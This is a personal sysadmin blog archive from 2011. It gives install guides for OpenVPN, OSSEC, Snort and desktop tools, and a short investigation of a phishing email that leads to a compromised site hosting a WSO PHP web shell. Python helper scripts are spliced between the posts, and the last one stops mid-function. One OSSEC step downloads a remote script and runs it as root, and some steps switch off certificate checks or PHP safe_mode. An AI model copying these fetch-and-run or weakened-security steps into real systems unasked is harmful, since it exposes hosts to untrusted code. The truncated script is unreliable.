10/31/2011

Installing OpenVPN 2.2 on Centos 5.7

OpenVPN is an SSL/TLS-based VPN. There are other VPN solutions such as IPsec, but OpenVPN provides a cost-effective alternative. I like OpenVPN as it supports two-way authentication, i.e. both the client and the server authenticate using certificates. To install OpenVPN on CentOS we need a number of cryptographic libraries. The simplest way is to use the DAG/RPMForge repository.

Set up the RPMForge repository [1], as this contains the packages necessary for the installation; the instructions are provided below. The instructions below are just to document this specific installation and therefore this blog post is not to be misinterpreted as a best-practice guide. The instructions are adapted from the OpenVPN website [2], but this blog post is intended more as a quick and dirty guide to getting OpenVPN running on CentOS 5.7. Additionally the set-up and configuration of the client is considered beyond the scope of this blog post.

  1. Install packages
    1. rpm -Uhv http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
    2. yum -y update
    3. yum -y install openvpn
  2. Set-up configuration files
    1. cd /etc/openvpn/
    2. cp /usr/share/doc/openvpn-2.2.0/sample-config-files/server.conf .
    3. mkdir -p /etc/openvpn/easy-rsa/keys
    4. cd /etc/openvpn/easy-rsa
    5. cp -rf /usr/share/doc/openvpn-2.2.0/easy-rsa/2.0/* .
    6. chmod +x clean-all build-* vars whichopensslcnf pkitool inherit-inter list-crl revoke-full sign-req
  3. Edit the PKI configuration
    1. vi /etc/openvpn/easy-rsa/vars
      1. Also consider setting the key length using the KEY_SIZE variable: 1024 is the default, 2048 is better but slows down the TLS handshake, but I am paranoid and use 4096-bit keys
      2. Set the country (KEY_COUNTRY), state (KEY_PROVINCE), locality (KEY_CITY), organisation name (KEY_ORG), and support email (KEY_EMAIL)
  4. Set-up the PKI infrastructure. This involves make a certificate authority and then generate the server certificate and any client machine certificates
    1. Create the certificate authority
      1. . ./vars
      2. ./clean-all
      3. ./build-ca
      4. The CA key (ca.key) and certificate (ca.crt) should now be in the keys directory inside the easy-rsa directory. Every server and client certificate below is signed with ca.key, so keep it private.
    2. Create certificate for the server
      1. ./build-key-server NAME_OF_SERVER
      2. Answer the questions and commit the certificate into the database
    3. Create the Diffie Hellman files
      1. These parameters are used for the Diffie-Hellman key exchange that establishes the session keys over an insecure channel, aka the Internet. Generation time grows with the length set in KEY_SIZE, so this may take a while.
      2. ./build-dh
    4. Create the certificate for each client
      1. When doing this for clients, I generate one for each device a client may use; that way, if a device is stolen or goes missing, I only have to revoke a single certificate and the others keep working as they do. Not sure if this is a good approach, but it's definitely my quick and dirty (lazy) approach.
      2. ./build-key LAPTOP
      3. ./build-key HOME-DESKTOP
      4. ./build-key PDA
  5. Edit the server configuration file 
    1. vi /etc/openvpn/server.conf
    2. Check/change
      1. local
      2. proto
      3. dev
      4. port
      5. ca
      6. cert
      7. key
      8. dh
      9. max-clients
      10. user
      11. group
      12. log-append
      13. verb
  6. Start everything
    1. /etc/rc.d/init.d/openvpn start
    2. chkconfig --level 235 openvpn on
Possible Errors:
  1. If the OpenVPN server fails to start, ensure that logging is enabled, i.e. refer to log-append in the configuration file, and examine the log. A common error is that OpenVPN fails to open certain files (ca, cert, key, dh); check that the paths to these files are specified correctly, preferably as absolute paths.
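As an added example (not part of the original post), the following Python script checks a server.conf for the kinds of mistakes listed under "Possible Errors": file directives (ca, cert, key, dh) that point at files which do not exist, and a missing user/group privilege drop or log destination. SAMPLE_CONF is a constructed configuration; resolving relative paths against /etc/openvpn is an assumption about the init script's working directory, and the `exists` parameter is injectable so the check can be run without touching the real filesystem.

```python
"""Sanity-check an OpenVPN server.conf before starting the daemon.

Added example (not from the original post). It flags the problems the post's
"Possible Errors" section points at, file paths OpenVPN cannot open and a
missing log, plus a missing privilege drop (user/group). SAMPLE_CONF is a
constructed configuration; the base_dir assumption is noted in check_conf().
"""
import os
import shlex

# Directives whose first argument is a file OpenVPN must be able to open.
FILE_DIRECTIVES = ("ca", "cert", "key", "dh", "crl-verify", "tls-auth")
# Directives a certificate-authenticated server cannot run without.
REQUIRED = ("ca", "cert", "key", "dh")

SAMPLE_CONF = """\
# constructed sample server.conf (not a real deployment)
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh4096.pem
;user nobody
;group nobody
max-clients 10
verb 3
"""


def parse_conf(text):
    """Return {directive: [args]}, keeping the last occurrence of each directive.

    OpenVPN treats '#' and ';' as comment markers, so the commented-out
    ';user nobody' in the sample is (correctly) not seen as a setting.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)
        conf[parts[0]] = parts[1:]
    return conf


def check_conf(text, base_dir="/etc/openvpn", exists=os.path.isfile):
    """Return a list of findings (an empty list means nothing obviously wrong).

    Relative paths are resolved against base_dir (assumed here to be the
    directory the init script starts OpenVPN from); `exists` is injectable so
    the check can run against a fake filesystem.
    """
    conf = parse_conf(text)
    findings = []
    for d in REQUIRED:
        if d not in conf:
            findings.append("missing required directive: %s" % d)
    for d in FILE_DIRECTIVES:
        if d in conf and conf[d]:
            path = conf[d][0]
            if not os.path.isabs(path):
                path = os.path.join(base_dir, path)
            if not exists(path):
                findings.append("%s: cannot find file %s" % (d, path))
    for d in ("user", "group"):
        if d not in conf:
            findings.append("no '%s' directive: daemon keeps root after startup" % d)
    if not ("log" in conf or "log-append" in conf):
        findings.append("no log/log-append: startup errors will be hard to find")
    return findings


if __name__ == "__main__":
    for finding in check_conf(SAMPLE_CONF):
        print(finding)
```

Run it against /etc/openvpn/server.conf (read the file and pass its text to check_conf) before the first start; an empty result does not prove the configuration is right, only that the checks above found nothing.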
References:

10/30/2011

Installing OSSEC on Centos 5.7

OSSEC is an open source host-based IDS that performs log analysis, and is able to correlate and analyse logs from a number of Linux (and Windows, but that is outside the scope of this blog post) servers. The software architecture of OSSEC and its use of agents lend themselves to flexible deployment and management [1].

Setting up the Atomic repository, which already has the appropriate OSSEC packages, and installing them from there would be the easiest way. However I have a strong dislike for the use of the /var partition as an install location (most system administrators, hmm... well, at least I have always set this up as a separate partition for ease of management and for security reasons), especially when it has been mounted "noexec".

Please Note
Firstly, there are a number of dependencies for some of the set-up below, such as Apache, PHP and MySQL, but the installation and secure configuration of these services are beyond the scope of this blog post. Secondly, the configuration below only sets up OSSEC as a monitor and does not run it as an IPS, i.e. with active response enabled.

Installation using the repository
  1. wget https://www.atomicorp.com/installers/atomic -O atomic.sh
  2. . ./atomic.sh
  3. yum -y update
  4. yum -y install ossec-hids ossec-hids-server ossec-wui
Installation using the tar ball source
  1. Download, compile and install the source
    1. wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz
    2. tar zxvf ossec-hids-2.6.tar.gz
    3. cd ossec-hids-2.6/src
    4. make clean
    5. make setdb
    6. make all
    7. cd ..
    8. ./install.sh
      1. en
      2. local
      3. /opt/ossec
      4. y
      5. user@domain
      6. mx.domain
      7. y
      8. y
      9. n
  2. Setup mysql DB for logging
    1. Grant access to database
      1. mysql -u root -p
      2. grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossecuser@localhost;
      3. set password for ossecuser@localhost=PASSWORD('PASSWD');
      4. quit;
    2. Create database and tables
      1. mysqladmin -u root -p create ossec
      2. mysql -u root -p ossec < src/os_dbd/mysql.schema
    3. Edit the /opt/ossec/etc/ossec.conf file
      1. Check the wiki to setup logging to the database and syslog [2]
  3. Install the Web User Interface, you will need Apache and php
    1. Again, the installation and secure configuration of Apache is beyond the scope of this blog post. 
    2. wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz
    3. tar zxvf ossec-wui-0.3.tar.gz
    4. mkdir -p /var/www/html/ossec-wui
    5. cp -rf ./ossec-wui-0.3/* /var/www/html/ossec-wui/
    6. cd /var/www/html/ossec-wui/
    7. ./setup.sh
    8. Edit the ossec_conf.php to point to the ossec installation completed in the previous stage
      1. $ossec_dir="/opt/ossec";
  4. Start the OSSEC services
    1. /opt/ossec/bin/ossec-control enable database
    2. /opt/ossec/bin/ossec-control enable client-syslog
    3. /opt/ossec/bin/ossec-control start
    Possible Errors:
    1. When executing OSSEC-WUI you may get a page that displays "Unable to access OSSEC directory". Ensure that the user your Apache web server runs as, e.g. httpd or apache, is added to the ossec group
      1. usermod -a -G ossec apache
    2. "Unable to retrieve alerts". Ensure that your web server is able to open the alerts file. This issue is two-fold: firstly ensure that the web server has permission to open the file, and secondly that fopen is permitted by the PHP configuration.
      1. safe_mode Off
      2. safe_mode_gid On
    3. These two are not so much errors as warnings that will annoy your syslog server, depending on your PHP configuration.
      1. PHP Warning:  shell_exec() has been disabled for security reasons - This is because of a uname -a call in the /var/www/html/ossec-wui/lib/os_lib_agent.php script; comment it out and hard-code the value instead:
        1. //$agent_list[$agent_count]{'os'} = `uname -a`;
        2. $agent_list[$agent_count]{'os'} = "Linux";
      2. PHP Warning:  fseek() expects parameter 3 to be long - This is a programming error in /var/www/html/ossec-wui/lib/os_lib_alerts.php: the whence argument is passed as the string "SEEK_SET" rather than the constant SEEK_SET, which is also the default, so simply drop it:
        1. //fseek($fp, $seek_place, "SEEK_SET");
        2. fseek($fp, $seek_place );
      References:

      10/29/2011

      Installing Snort 2.9.1.2 on CentOS 5.7

      CentOS 5.7 uses an older version of libpcap (0.9.4), but Snort's Data Acquisition Library (daq) needs a newer version of libpcap (>=1.0.0). The latter is not an issue with CentOS 6.0. Vishesh Kumar [1] provides excellent instructions for getting Snort 2.9 to run on RHEL 5 (http://www.linuxmantra.com/2010/10/install-snort-29-on-rhel-5.html). The purpose of this post is not to duplicate his efforts, but to extend them slightly to include instructions for a complete Snort set-up.
      1. libpcap - http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz [3]
      2. daq : http://www.snort.org/downloads/1221 [2]
      3. snort : http://www.snort.org/downloads/1207 [2]
      Download and install the libraries and software as per the instructions below;
      1. Enable the Extra Packages for Enterprise Linux (EPEL) repository to allow the installation of additional packages not available in the standard repositories
        1. rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
        2. yum -y update
        3. yum -y upgrade
      2. Install the development tools needed to compile the libraries and source code, plus the additional libraries and header files that are required later on
        1. yum -y groupinstall 'Development Tools'
        2. yum -y install pcre-devel
        3. yum -y install libdnet-devel
        4. yum -y install zlib-devel
        5. yum -y install mysql mysql-server mysql-devel mysql-bench
      3. Download, compile and install libpcap
        1. wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
        2. tar zxvf libpcap-1.1.1.tar.gz
        3. cd libpcap-1.1.1
        4. ./configure --prefix=/usr
        5. make && make install
      4. Download, compile and install daq
        1. wget http://www.snort.org/downloads/1221 -O daq-0.6.2.tar.gz
        2. tar zxvf daq-0.6.2.tar.gz
        3. cd daq-0.6.2
        4. ./configure
        5. make && make install
      5. Download, compile and install snort
        1. wget http://www.snort.org/downloads/1207 -O snort-2.9.1.2.tar.gz
        2. tar zxvf snort-2.9.1.2.tar.gz
        3. cd snort-2.9.1.2
        4. ./configure --with-mysql
        5. make && make install
      6. Download, compile and install Barnyard2
        1. wget --no-check-certificate https://github.com/firnsy/barnyard2/tarball/master -O firnsy-barnyard2-405761e.tar.gz
        2. tar zxvf firnsy-barnyard2-405761e.tar.gz
        3. cd firnsy-barnyard2-405761e
        4. ./autogen.sh
        5. ./configure --with-mysql
        6. make && make install
      7. Create the snort database on the MySQL engine
        1. mysqladmin -u root -p create snort
        2. mysql -u root -p -D snort < schemas/create_mysql
        3. mysql -u root -p
          1. GRANT CREATE,INSERT ON root.* TO snort@localhost IDENTIFIED BY 'PASSWORD';
          2. GRANT CREATE,INSERT,SELECT,DELETE,UPDATE ON snort.* TO snort@localhost IDENTIFIED BY 'PASSWORD';
      8. To get the current registered user rules, you need to sign up and obtain an Oinkcode. The Oinkcode will be used for downloading the rules and used with pulledpork.
        1. Sign in or request an account from https://www.snort.org/login
        2. Get your oinkcode after signing in from https://www.snort.org/account/oinkcode
        3. cd etc
        4. wget http://www.snort.org/reg-rules/snortrules-snapshot-.tar.gz/OINKCODE -O snortrules-snapshot-LATEST.tar.gz
        5. tar zxvf snortrules-snapshot-LATEST.tar.gz
      9. Setup the configuration and rules files for snort
        1. mkdir -p /etc/snort
        2. mv -f etc/* .
        3. rmdir etc/
        4. mv snortrules-snapshot-LATEST.tar.gz ../../
        5. rm -f Makefile Makefile.am Makefile.in
        6. cp -rf * /etc/snort/
      10. Edit the snort configuration
        1. vi /etc/snort/snort.conf
          1. ipvar HOME_NET
          2. var RULE_PATH rules
          3. var SO_RULE_PATH so_rules
          4. var PREPROC_RULE_PATH preproc_rules
          5. output database: log, mysql, user=snort password=PASSWORD dbname=snort host=localhost
          6. output alert_syslog: LOG_LOCAL6 LOG_ALERT
      11. Edit the syslog.conf file to log alerts to separate file and restart the syslog daemon
        1. Include the line in syslog.conf "local6.*        /var/log/snort/alerts.log"
        2. /etc/rc.d/init.d/syslog restart
      12. Test the snort installation, and set-up environment to run snort if all OK
        1. snort -c /etc/snort/snort.conf -T
        2. groupadd snort
        3. useradd -g snort -s /bin/false snort
        4. chown -R root:snort /var/log/snort
        5. chmod -R g+w /var/log/snort
      13. Configure barnyard [4]
        1. mkdir -p /var/log/barnyard2
        2. chown root:snort /var/log/barnyard2
        3. chmod 770 /var/log/barnyard2
        4. touch /var/log/snort/barnyard2.waldo
        5. cp etc/barnyard2.conf /etc/snort/
        6. Edit the /etc/snort/barnyard2.conf
          1. output database: log, mysql, user=snort password=PASSWORD dbname=snort host=localhost
          2. config hostname:   localhost
          3. config interface:  eth0
      14. You can get snort to start automatically, either by writing a custom init script to start/stop/restart the daemon or simply by kicking it off when the machine boots. Edit the rc.local file and put the following in
        1. /usr/local/bin/snort -D -u snort -g snort -c /etc/snort/snort.conf -i eth0
        2. /usr/local/bin/barnyard2 -c /etc/snort/barnyard2.conf -d /var/log/snort -f snort.log -w /var/log/snort/barnyard2.waldo -D
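As an added example, not from the original post or from the Snort project, here is a small Python parser for the alert lines that arrive on the local6 syslog facility configured in step 11. The sample lines are constructed to follow the alert_syslog output format of Snort 2.9 (the SIDs, messages and addresses are made up); it skips non-Snort syslog lines and counts alert sources by priority, which is the usual first cut when reviewing /var/log/snort/alerts.log.

```python
"""Parse Snort alert_syslog lines into records and summarise them.

Added example, not from the original post or from Snort. SAMPLE_SYSLOG is
constructed to follow the alert_syslog output format of Snort 2.9:
  snort[pid]: [gid:sid:rev] msg [Classification: c] [Priority: n]: {PROTO} src:port -> dst:port
The SIDs, messages and addresses are made up for the demonstration.
"""
import re
from collections import Counter

SAMPLE_SYSLOG = """\
Oct 30 21:15:02 sensor snort[2417]: [1:1000001:1] LOCAL id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 192.168.56.101:80 -> 192.168.56.1:50123
Oct 30 21:15:09 sensor snort[2417]: [1:1000002:1] LOCAL ICMP PING [Classification: Misc activity] [Priority: 3]: {ICMP} 192.168.56.1 -> 192.168.56.101
Oct 30 21:16:41 sensor snort[2417]: [1:1000003:2] LOCAL Potential SSH Scan [Classification: Attempted Information Leak] [Priority: 2]: {TCP} 192.168.56.1:41720 -> 192.168.56.101:22
Oct 30 21:16:42 sensor kernel: eth0: link up
"""

# The colon after [Priority: n] is optional so both Snort 2.8 and 2.9 style
# lines match; ports are absent for ICMP, hence the optional port groups.
ALERT_RE = re.compile(
    r"snort\[\d+\]: \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.*?) "
    r"(?:\[Classification: (?P<classification>[^\]]*)\] )?"
    r"\[Priority: (?P<priority>\d+)\]:? \{(?P<proto>\w+)\} "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))? -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?\s*$"
)


def parse_alert(line):
    """Return a dict for a Snort alert line, or None for any other syslog line."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    for field in ("gid", "sid", "rev", "priority", "sport", "dport"):
        rec[field] = int(rec[field]) if rec[field] is not None else None
    rec["timestamp"] = line[:15]  # syslog "Mon DD HH:MM:SS" prefix
    return rec


def parse_syslog(text):
    """Parse every line of a syslog file, silently skipping non-Snort lines."""
    return [r for r in (parse_alert(line) for line in text.splitlines()) if r]


def top_sources(alerts, max_priority=2):
    """Count alert sources at or above a priority (1 is the most severe)."""
    return Counter(a["src"] for a in alerts if a["priority"] <= max_priority)


if __name__ == "__main__":
    alerts = parse_syslog(SAMPLE_SYSLOG)
    for src, n in top_sources(alerts).most_common():
        print(src, n)
```

Feed it the real file (open("/var/log/snort/alerts.log").read()) once alerts are flowing; lines that do not match are dropped rather than raising, so check the count against wc -l if the numbers look low.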
      Common Errors:
      1. ERROR: parser.c(5261) Could not stat dynamic module path "/usr/local/lib/snort_dynamicrules": No such file or directory.
        Fatal Error, Quitting..
        1. mkdir -p /usr/local/lib/snort_dynamicrules
        2. cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/
      2. ERROR: /etc/snort/rules/web-misc.rules(555) Cannot use the fast_pattern content modifier for a lone http cookie/http raw uri /http raw header /http raw cookie /status code / status msg /http method buffer content.
        Fatal Error, Quitting..
        1. The fast_pattern option cannot be used with the http_method string. Edit the web-misc.rules file and remove it from the snort rule. Do a search for "2010-0388" and remove the alert option fast_pattern from the alert rule.
      3. ERROR: /etc/snort/snort.conf(244) => 'compress_depth' and 'decompress_depth' should be set to max in the default policy to enable 'unlimited_decompress'
        Fatal Error, Quitting..
        1. Edit the /etc/snort/snort.conf file and set the http_inspect compress_depth and decompress_depth to 65535 from 20480.
      4. ERROR: ByteExtract variable 'bugtraq' in rule [3:13897] is used before it is defined
        1. Ensure that the shared libraries copied above using "cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/" are for the correct distribution
        2. Ensure that the rules being used are for the version of snort being used.
      Please note: 
      1. These instructions are for 32-bit hardware; for 64-bit machines you will need to select the appropriate 64-bit RPM packages or configure and compile with the appropriate compiler switches. These are considered beyond the scope of this post.
      2. All instructions are executed with root privileges.
      References:
      1. http://www.linuxmantra.com/2010/10/install-snort-29-on-rhel-5.html
      2. http://www.snort.org/snort-downloads?
      3. http://www.tcpdump.org/#latest-release
      4. http://www.snort.org/assets/145/Install_Snort_2.8.6_on_CentOS_5.5.pdf

      10/26/2011

      Gnu Screen

      Running some experiments on a VM server I rapidly ran out of patience having to wait for commands to run, and/or switching back and forth using Ctrl+Z, bg, and fg. My thoughts went back to Nick Black, who had introduced me to GNU Screen several years back; alas, I had forgotten the short-cuts. Thankfully Google and the man page came to the rescue.

      Since the VM server was a CentOS 6.0 box with a minimal install, I had to install GNU Screen using;

      1. yum -y install screen
      Here's a summary of the shortcuts that may be useful;
      • Ctrl+A, c : create a new window
      • Ctrl+A, A : set a title for the current window instead of the default shell name (bash)
      • Ctrl+A, " : list the windows available
      • Ctrl+A, n : switch to the next window
      • Ctrl+A, p : switch to the previous window
      References:
      1. http://www.gnu.org/s/screen/

      10/25/2011

      APAcite on Mac OS X (Lion) with texlive

      I recently had to rebuild my MacBook Pro (gasp!), and decided to upgrade to Lion. The whole process was relatively painless. Files were copied back from backups and updated from my SVN repositories; however, I had trouble installing the appropriate MacPorts package for the APAcite classes.

      sudo port install texlive-bibtex-extra

      The latter yielded errors, which were logged in

      /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/main.log

      Since the dependency p5.12-text-bibtex could not be installed, examination of the log file provided the following clue: error: 'main' must return 'int'

      The same error was reported for;

      1. /opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/namebug.c
      2. /opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/tex_test.c

      A quick change of the main() return type from void to int in both files enabled the package to be installed without further issues.

      10/17/2011

      APAcite on Mac OS X with texlive

      While compiling a LaTeX document, a blank template of my PhD thesis to be exact, I got the following error: "! LaTeX Error: File `apacite.sty' not found." A quick search of MacPorts indicated that the texlive-bibtex-extra package was required. It was quickly installed using;

      sudo port install texlive-bibtex-extra

      The subsequent compile yielded more errors, this time "! Undefined control sequence. \abstract". This was solved using the texlive-latex-extra package, installed using;

      sudo port install texlive-latex-extra


      Then adding the following to define the abstract in the book documentclass;

      % Define abstract in book documentclass
      \pagestyle{empty}
      \newenvironment{abstract}%
      {
        \onehalfspacing%
        \null
        \vfill
        \chapter*{\centering Abstract}%
        \addcontentsline{toc}{chapter}{Abstract}
      }%
      {\vfill\null}

      % Start the actual abstract
      \begin{abstract}
      \end{abstract}

      More errors resulted: "! Use of \@year@ doesn't match its definition." I had to add "\bibliographystyle{apacite}" to the bibliography page, and all was well once again.

      References:
      1. https://trac.macports.org/wiki/TeXLivePackages
      2. http://www.cs.utexas.edu/~witchel/errorclasses.html

      9/21/2011

      Evernote and Nix/NeverNote on Ubuntu 10.04

      Evernote is a great tool. I absolutely love it. The only con is that it's not available natively for Linux, so I have to run it under wine, the Windows compatibility layer. The installation is fairly simple.
      1. wget http://evernote.s3.amazonaws.com/win4/public/Evernote_4.5.0.5229.exe
      2. wine Evernote_4.5.0.5229.exe
      Obviously, not running natively, there is a slight performance lag. This may be attributed to my 5-year-old laptop. Although it's still usable, the slow synchronization soon becomes tiresome. Fortunately there is a Linux-native client called NeverNote [2].
      1. sudo add-apt-repository ppa:vincent-c/nevernote
      2. sudo apt-get update
      3. sudo apt-get install nevernote
      4. nixnote
      NixNote is a bit ugly, but functional. Definitely faster than running Evernote under wine. The feature that I like best is that you are able to encrypt the NixNote database using AES when you shut down. This is a definite plus in my books.

      Therefore, if you can live with the degraded performance, then Evernote will do; but if you need to work faster, want that extra bit of security, and an ugly interface does not bother you, then give NixNote (aka NeverNote) a try.

      References:
      1. http://www.howtogeek.com/howto/35661/how-to-install-evernote-4.0-in-ubuntu-using-wine/
      2. http://www.techdrivein.com/2011/06/nevernote-open-source-evernote-clone.html

      Cisco console from Ubuntu 10.04

      It's pretty easy to set up Cisco serial console connectivity on Ubuntu 10.04. The usual way is to use minicom. The serial ports, usually called COM1-4, usually have the following I/O base addresses;
      1. COM1 - 3F8
      2. COM2 - 2F8
      3. COM3 - 3E8
      4. COM4 - 2E8
      To complete the setup, first determine the address used for COM1 (or whichever serial port you wish to use) on your machine by querying the kernel ring buffer using the dmesg command, then install and configure minicom, the terminal emulation tool.
      1. sudo dmesg | grep tty
      2. sudo apt-get install minicom
      3. sudo minicom -s # Configure the terminal to use 9600-8-N-1 and save as dfl
      4. sudo minicom

      References:
      1. https://help.ubuntu.com/community/CiscoConsole
      2. http://useopensource.blogspot.com/2007/01/using-cisco-console-in-linux.html

      9/20/2011

      KeePass on Ubuntu 10.04

      KeePass is a very popular password management program. One of my clients uses this for their systems and I was given a copy of their database. Since I mostly use Linux when I am working, I needed a way to get this working on Ubuntu 10.04. Instructions are widely available, but again, for my benefit, I have documented them here as a step-by-step guide. At the time of this blog post the 2.x version of KeePass was 2.16.

      Firstly install Mono. For more details refer to the Badger ports website[1].
      1. Edit the /etc/apt/sources.list file
        • Add the lines
          • # For mono 2.6 -> needed by KeePass
          • deb http://badgerports.org lucid main
      2. cd /etc/apt
      3. sudo wget http://badgerports.org/directhex.ppa.asc
      4. sudo apt-key add directhex.ppa.asc
      5. sudo apt-get update
      6. sudo apt-get install mono mono-devel
      7. mono --version
        • # Confirm the mono version is >= 2.6
      Download and install the KeePass from the KeePass website[2].
      1. sudo mkdir -p /opt/KeePass2
      2. cd /opt/KeePass2
      3. wget http://downloads.sourceforge.net/keepass/KeePass-2.16.zip
      4. sudo unzip KeePass-2.16.zip
      Execute the KeePass application
      1. mono /opt/KeePass2/KeePass.exe &
      There does appear to be a lot of debug information (I am assuming it's debug information) written to the terminal, but this should be safe to ignore.

      References:
      1. http://badgerports.org
      2. http://keepass.info

      9/15/2011

      SPAM - Westpac Notice

      I recently got an email with the subject "[Bulk] Westpac Notice" claiming to be from "notice@westpac.com.au". I knew this was spam, but was curious nonetheless. I felt like investigating further, but didn't have much time... my curiosity got the better of me, and I decided to do some quick digging anyway.


      The link in the email resolved to "http://www.backrite.com/cw3/assets/product_small/Westpac.com.au/Westpac/index.htm", a very crude attempt I thought; the least they could have done was get a domain that at least appears slightly legitimate, or use a URL shortening service.

      I fired up my debugging VM, opened up Firefox and pasted the URL in; the site appeared to be down. This was going to be quicker than I thought. Next I examined the e-mail headers and found a number of interesting things;


      X-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
      X-YahooFilteredBulk: 72.52.199.90
      Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
      X-YMailISG: uqaL3oQWLDupZk39g7NZ_d1X.jvu2AiRfqDcSAS5WI1yggQj
       qKsr_wBhJ6fOB576uyrk3sOva0uAvBRbH2D9buWQ2RMJpgB.gBvrBbexkVVz
       XhkFvqbM2oAMn_GHLmNEOUb_wcs6rU031UCGN0Gc8InmvAhB8wE6ua0shbqw
       gqobfvaLzFTrjLeJ03BlqKdv3L_RDh4xyyLL2saipKDl7XkbKwLizqsr4c6R
      X-Originating-IP: [72.52.199.90]
      Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
      Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
        by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
      Received: from nobody by server22.01domain.net with local (Exim 4.69)
      (envelope-from )
      id 1R3GyS-0001kr-68
      for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
      To: me@me.com
      Subject: [Bulk] Westpac Notice
      X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
      From:  
      Reply-To: 
      MIME-Version: 1.0
      Content-Type: text/html
      Content-Transfer-Encoding: 8bit
      Message-Id:
      Date: Mon, 12 Sep 2011 20:35:40 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - server22.01domain.net
      X-AntiAbuse: Original Domain - me.com
      X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
      X-AntiAbuse: Sender Address Domain - server22.01domain.net

      Firstly, the originating IP did not match the server in the URL. Next the X-PHP-Script header gave an interesting clue: a copy and paste revealed another downed script, but this time the response from the server was more promising, and a quick fuzz found "http://proteinat.com/store/images/cookie_load.php", which is a PHP shell called Web Shell by oRb, or WSO.

      The running version was 2.5, which was released in June of 2011. The attacker must have exploited PHP and uploaded the file. The PHP shell provides a console which is useful for further work, e.g. creating a backdoor, as well as for running exploits to escalate privileges to get root access. I have not had the chance to investigate further, but it would be interesting to determine how the hacker got in in the first place.
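As an added example (not from the original post), the Python below automates the header reading done above: it unfolds the headers, walks the Received chain for the host that handed the message to the recipient's MTA, and pulls out the SPF/DKIM verdicts and the X-PHP-Script hint. SAMPLE_HEADERS is reconstructed from the headers quoted in this post (addresses redacted as in the post, line folding restored, and the From header filled in from the prose); the indicator rules at the end are this example's own choices, not a standard.

```python
"""Triage the headers of a phishing e-mail.

Added example, not from the original post. SAMPLE_HEADERS is reconstructed
from the headers quoted in the post (addresses redacted as in the post, line
folding restored, From filled in from the prose). The indicator rules in
indicators() are this example's own choices.
"""
import re

SAMPLE_HEADERS = """\
X-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
X-Originating-IP: [72.52.199.90]
Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
  by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
Received: from nobody by server22.01domain.net with local (Exim 4.69)
  (envelope-from )
  id 1R3GyS-0001kr-68
  for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
To: me@me.com
Subject: [Bulk] Westpac Notice
X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
From: notice@westpac.com.au
Content-Type: text/html
"""

# One relay hop: "from <helo> [(EHLO <name>)] [(<ip>)] by <host> ..."
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\(EHLO\s+(?P<ehlo>[^)]+)\))?"
    r"(?:\s+\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\))?"
    r"\s+by\s+(?P<by>\S+)"
)


def parse_headers(raw):
    """Return [(name, value)] in message order, unfolding continuation lines."""
    headers = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return headers


def get(headers, name):
    """All values for a header name (case-insensitive), in message order."""
    return [v for n, v in headers if n.lower() == name.lower()]


def received_chain(headers):
    """Relay hops from the Received headers, nearest to the recipient first."""
    hops = []
    for value in get(headers, "Received"):
        m = HOP_RE.search(value)
        if m:
            hops.append(m.groupdict())
    return hops


def triage(raw):
    """Pull out the fields a responder checks before anything else."""
    h = parse_headers(raw)
    hops = received_chain(h)
    orig = get(h, "X-Originating-IP")
    spf = get(h, "Received-SPF")
    auth = " ".join(get(h, "Authentication-Results"))
    php = get(h, "X-PHP-Script")
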